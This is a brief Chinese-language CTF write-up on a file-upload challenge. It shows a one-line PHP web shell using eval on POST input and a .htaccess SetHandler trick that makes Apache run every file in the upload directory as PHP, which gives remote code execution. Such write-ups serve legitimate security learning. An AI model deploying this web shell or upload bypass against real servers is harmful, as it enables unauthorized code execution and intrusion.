目录
思路
根据提示上传了包含shell的jpg文件,上传成功,点击下载文件,发现没有存在文件包含点,访问upload检查是否有可执行文件,提示没有权限,但是发现中间件是apache
可以直接上传phtml,但是文件没有被成功解析.这时候可以上传.htaccess,对所有文件进行php解析
<?php echo 123;eval($_POST['kradress']);?>
.htaccess
Sethandler application/x-httpd-php
<!-将该目录及子目录下的文件均按照php文件解析执行-->
再访问phtml,发现回显成功,直接RCE拿到flag
总结
…
